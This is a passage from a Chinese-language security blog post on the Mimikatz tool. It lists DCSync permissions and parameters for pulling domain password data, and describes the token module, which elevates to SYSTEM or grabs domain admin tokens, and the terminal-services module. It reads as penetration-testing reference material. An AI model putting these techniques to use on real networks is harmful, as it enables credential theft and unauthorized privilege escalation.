<p>运行 DCSync 所要求的特殊权限有管理员组（Administrators），域管理员组（ Domain Admins）或企业管理员组（Enterprise Admins）以及域控制器计算机帐户的任何成员。需要注意的是只读域控制器默认是不允许读取用户密码数据的。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">参数：</span></span><br><span class="line">/all      # 获取所有用户</span><br><span class="line">/user     # 要拉取数据的用户</span><br><span class="line">/domain   # 可选，Active Directory域的全限定域名，Mimikatz会发现域中的一个DC并去连接。如果不提供该参数，Mimikatz会默认设置为当前域。</span><br><span class="line">/dc       # 可选，指定你想要使用DCSync连接并收集数据的域控制器。</span><br><span class="line">/csv      # 可选，以格式化形式显示</span><br></pre></td></tr></table></figure>

<h3 id="token"><a href="#token" class="headerlink" title="token"></a>token</h3><p>Token 模块能够与 Windows 身份验证令牌进行交互，包括抓取，伪造假冒的已存在的令牌</p>
<p><code>Commands: whoami, list, elevate, revert</code></p>
<p>**<code>whoami</code>**：显示当前身份<br><strong><code>elevate</code></strong> ：假冒令牌。用于提升权限至 SYSTEM 权限（默认）或者使用 Windows API 找到域管理员令牌</p>
<h3 id="process"><a href="#process" class="headerlink" title="process"></a>process</h3><p>process 模块提供了收集进程的数据和与进程进行交互的功能</p>
<p><code>Commands: list, exports, imports, start, stop, suspend, resume</code></p>
<h3 id="ts"><a href="#ts" class="headerlink" title="ts"></a>ts</h3><p>终端服务器模块</p>
<p>**<code>sessions</code> **：显示当前对话<br>**<code>multirdp</code>**：允许多个用户使用rdp</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2023/04/30/内网渗透/mimikatz/">http://dar1in9s.github.io/2023/04/30/内网渗透/mimikatz/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%B7%A5%E5%85%B7/">工具</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/05/01/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/kerberos%E5%8D%8F%E8%AE%AE/"><i class="fa fa-chevron-left">  </i><span>Kerberos协议</span></a></div><div class="next-post pull-right"><a href="/2023/04/04/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/"><span>内网渗透之权限提升</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 - 2024 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/algolia.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
  tex2jax: {
    inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
    processEscapes: true,
    skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
  },
  CommonHTML: {
    linebreaks: { automatic: true, width: "90% container" }
  },
  "HTML-CSS": { 
    linebreaks: { automatic: true, width: "90% container" }
  },
  "SVG": { 
    linebreaks: { automatic: true, width: "90% container" }
  }
});
</script><script type="text/x-mathjax-config">MathJax.Hub.Queue(function() {
  var all = MathJax.Hub.getAllJax(), i;
  for (i=0; i < all.length; i += 1) {
    all[i].SourceElement().parentNode.className += ' has-jax';
  }
});
</script><script src="https://cdn.jsdelivr.net/npm/mathjax/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>